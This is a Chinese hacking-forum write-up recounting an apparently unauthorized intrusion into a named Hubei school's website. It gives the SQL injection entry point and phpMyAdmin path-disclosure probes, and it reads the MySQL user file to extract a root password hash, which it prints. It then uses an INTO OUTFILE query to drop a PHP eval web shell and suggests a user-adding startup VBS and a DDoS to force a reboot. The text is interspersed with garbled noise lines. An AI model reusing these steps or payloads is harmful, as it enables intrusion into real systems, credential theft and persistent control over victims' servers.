友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


6 n) A. l( [2 F( {  [( |1 g
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

, [+ j7 `; |  W+ _0 @) Z1 P那么想可以直接写入shell ，getshell有几个条件：
1 o2 ?7 {& I; _8 C2 `( K4 E; y

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
8 P0 p' p6 K0 k1 ~! N( Y: Z- p1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
0 L7 D; {3 C% Y3 k' t3 v5 c" s4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

* ~' M  I8 f8 |% K# u2 d均不行...........................
0 Z5 x, U5 M$ F# Y' P
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
7 L5 H) z# `' g3 H3 l# H
- p+ [7 j( h2 C+ ?. Q权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
1 c! K2 t5 U8 r% Y
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
& n2 O( w& |( C) h
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
) C: f$ Z# a% d/ ~7 m9 k0 a4 r2 U
4 t! \# p9 C0 h$ I2 C想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
3 @! {! h( F* p! z
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
# g7 i2 q' e" f% S* J
$ M4 t" g+ k) _9 c8 t成功读到root密码：
% ?) ~5 D' @( o. S; r/ [
17---- r(0072)
9 m$ @. }( T5 d( f2 r6 J18---- o(006f)
19---- o(006f)
20---- t(0074)
2 X3 W* o# d6 Q7 C5 W8 k21---- *(002a)
22---- 8(0038)
7 {2 L/ u2 x* \5 p) r) r4 l- K: P23---- 2(0032)
3 l2 S) {) B6 T7 [: {/ z24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
8 k0 O/ R) T6 v  i/ A8 @30---- 8(0038)
$ y% {" F& C5 D5 b. \5 L31---- A(0041)
; }* k/ u; d1 _: g2 Y/ P! C32---- 9(0039)
33---- B(0042)
34---- 5(0035)
/ }) V6 C. j! i6 v35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
/ p. @$ {8 r$ R8 j; n, o39---- 9(0039)
; ?9 d5 n; y5 }% e' y40---- 1(0031)
, ~- L" h4 a! h% G" F41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
4 h: z' T$ j: M3 H45---- 9(0039)
" \; Q. q% I3 T" A9 `/ K7 c( {' x3 W46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
& v/ ~+ D) ^- U" L5 ~50---- F(0046)
51---- 0(0030)
4 h& I7 [9 E0 h: p. J- q% q5 m' Y4 X52---- 3(0033)
: x9 i" \8 E- |4 ^1 p53---- 2(0032)
6 e: ?  k+ Z. f, x54---- A(0041)
/ F/ o; _; k  O- v( N55---- 4(0034)
3 h0 W6 _: w# h; P. L: D; U56---- A(0041)
' e: e/ P8 [' Q1 X0 M- U, g57---- B(0042)
58---- *(0044)
9 H: J" ^* j6 s$ [" w! H+ a59---- *(0035)
60---- *(0041)
$ g/ ~$ |" O' D) h- K' @- R, D61---- *0032)
3 r6 w3 n- ?# h# n' p
解密后成功登陆phpmyamin
4 D4 L" [3 O9 b7 ~# g  M- U, s# r                          

                             
+ U! ]# k/ P! ]. _2 ?& \& ?% ~5 q
6 P2 V3 d# a& f3 Y- c. e, \找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
+ T6 p5 n3 C7 ]0 I5 U
成功执行，拿下shell，菜刀连接：
( S; D7 d4 K8 I- f, p8 F8 n
; j- K; j2 M  x* Q9 F( v7 z5 j* ]服务器不支持asp,aspx,php提权无果...................
+ A7 R( B. a# [7 {
3 Q, ?; E6 E6 U但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

# b: _) R( y0 W9 c2 H/ r; I

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

: V* d% D* X; m( L- K

-------------------------------------------------------------------------------
admin
0 t8 e; n( S3 F9 T" c2 x" m' K' J/ yAdministrator
) K$ K" n. @' I' Z# f* T- ^slipper$
3 c0 Y) G) V: z1 A& Z6 T+ B, Jsqluser
命令成功完成。
2 Y7 Y7 X- O" |! Y  x5 u0 V
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
; E( |" X6 ~$ ?) h
ddos服务器重启，不然就只能坐等服务器重启了...............................
4 H; L. c2 x+ h
: L/ ~3 G: `! @0 G: `7 g* f6 h7 Y      

angel